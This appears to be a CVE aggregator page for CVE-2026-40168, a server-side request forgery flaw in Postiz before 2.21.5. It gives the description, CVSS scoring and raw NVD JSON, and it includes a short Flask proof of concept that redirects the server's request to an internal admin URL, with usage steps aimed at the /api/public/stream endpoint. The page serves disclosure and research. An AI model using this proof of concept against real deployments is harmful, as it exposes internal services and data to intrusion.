Security Vulnerability Report
中文
CVE-2026-40168 CVSS 8.2 HIGH

CVE-2026-40168

Published: 2026-04-10 20:16:23
Last Modified: 2026-04-14 20:09:04
Source: [email protected]

Description

Postiz is an AI social media scheduling tool. Prior to 2.21.5, the /api/public/stream endpoint is vulnerable to SSRF. Although the application validates the initially supplied URL and blocks direct private/internal hosts, it does not re-validate the final destination after HTTP redirects. As a result, an attacker can supply a public HTTPS URL that passes validation and then redirects the server-side request to an internal resource.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:gitroom:postiz:*:*:*:*:*:*:*:* - VULNERABLE
Postiz < 2.21.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-40168 (Postiz SSRF) # This script simulates an attacker-controlled server that redirects to an internal resource. from flask import Flask, redirect, request app = Flask(__name__) @app.route('/poc') def redirect_to_internal(): # The target internal resource (e.g., internal admin panel, metadata service) target_internal_url = "http://127.0.0.1:8080/admin" return redirect(target_internal_url, code=302) if __name__ == '__main__': # Attacker runs this server on a public IP app.run(host='0.0.0.0', port=80) # Usage: # Send a request to the vulnerable Postiz endpoint: # POST /api/public/stream # { "url": "http://<attacker-ip>/poc" }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40168", "sourceIdentifier": "[email protected]", "published": "2026-04-10T20:16:22.643", "lastModified": "2026-04-14T20:09:03.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Postiz is an AI social media scheduling tool. Prior to 2.21.5, the /api/public/stream endpoint is vulnerable to SSRF. Although the application validates the initially supplied URL and blocks direct private/internal hosts, it does not re-validate the final destination after HTTP redirects. As a result, an attacker can supply a public HTTPS URL that passes validation and then redirects the server-side request to an internal resource."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitroom:postiz:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.21.5", "matchCriteriaId": "F8244F9F-08C4-4279-883D-470D3C7145F8"}]}]}], "references": [{"url": "https://github.com/gitroomhq/postiz-app/commit/30e8b777098157362769226d1b46d83ad616cb06", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/gitroomhq/postiz-app/releases/tag/v2.21.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-34w8-5j2v-h6ww", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-34w8-5j2v-h6ww", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.